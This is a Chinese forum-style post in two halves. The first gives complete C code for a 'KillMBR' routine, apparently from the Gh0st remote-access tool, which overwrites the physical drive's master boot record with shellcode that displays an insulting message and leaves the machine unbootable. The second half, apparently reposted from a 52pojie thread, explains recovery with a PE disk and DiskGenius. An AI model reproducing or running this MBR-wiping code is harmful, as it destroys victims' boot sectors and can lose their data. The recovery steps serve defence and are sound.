硬盘锁---MBR病毒

unsigned char scode[] =
"\xb8\x12\x00\xcd\x10\xbd\x18\x7c\xb9\x18\x00\xb8\x01\x13\xbb\x0c"
"\x00\xba\x1d\x0e\xcd\x10\xe2\xfe\x49\x20\x61\x6d\x20\x76\x69\x72"
"\x75\x73\x21\x20\x46\x75\x63\x6b\x20\x79\x6f\x75\x20\x3a\x2d\x29";


int CGh0stApp::KillMBR()
{
	HANDLE hDevice;
	DWORD dwBytesWritten, dwBytesReturned;
	BYTE pMBR[512] = { 0 };

	// 重新构造MBR
	memcpy(pMBR, scode, sizeof(scode)-1);
	pMBR[510] = 0x55;
	pMBR[511] = 0xAA;

	hDevice = CreateFile
		(
		"\\\\.\\PHYSICALDRIVE0",
		GENERIC_READ | GENERIC_WRITE,
		FILE_SHARE_READ | FILE_SHARE_WRITE,
		NULL,
		OPEN_EXISTING,
		0,
		NULL
		);
	if (hDevice == INVALID_HANDLE_VALUE)
		return -1;
	DeviceIoControl
		(
		hDevice,
		FSCTL_LOCK_VOLUME,
		NULL,
		0,
		NULL,
		0,
		&dwBytesReturned,
		NULL
		);
	// 写入病毒内容
	WriteFile(hDevice, pMBR, sizeof(pMBR), &dwBytesWritten, NULL);
	DeviceIoControl
		(
		hDevice,
		FSCTL_UNLOCK_VOLUME,
		NULL,
		0,
		NULL,
		0,
		&dwBytesReturned,
		NULL
		);
	CloseHandle(hDevice);


	ExitProcess(-1);
	return 0;
}

== == ==  == == == == == == == == 该病毒修复方法 == == == == == === == == == == == == == == == == == ==
原文链接：http://www.52pojie.cn/thread-301587-1-1.html

经常看见有人被锁硬盘  开机以后出现一行红字 FUCK  YOU POJIEZHE  等等云云的 这个问题主要还是病毒对Mbr分区的修改造成的 下面我教给大家一个无损数据   无损硬盘  无需重装系统的解决办法 首先普及一下基础知识   主分区和扩展分区的信息被保存在硬盘的MBR内 也就是说开机运行的时候经过主板给各个部位加电  然后。。。再然后读取硬盘的mbr分区内的系统信息  然后加载系统  如果这个MBR分区的信息是错误的那么就会提示你一个错误信息 而这个错误信息是可以被自定义的（通过修改MBR分区的信息） 这样就进不去系统 废话说完了   言归正传  怎么解决这个问题   如果出现这个问题必须要进PE操作  因为硬盘的系统已经损坏了   1,进PE   2.打开diskgenius分区工具 可以看到硬盘的数据全都完蛋了   3.不用着急 右键点击硬盘选择搜索已丢失的分区（重建主引导记录）   4.选择整个硬盘  点击开始搜索   5.搜索到这样的数据点击保留   6.如果还出现这样的对话框 还是继续选择保留 当进度到达100%的时候点击确定 7.点击保存按钮   8.然后你会发现数据都回来了   9.重建主引导记录   跳出的框框全都选则：“是“ 10.修复一下系统引导 也是在PE里面操作   熟悉的开机画面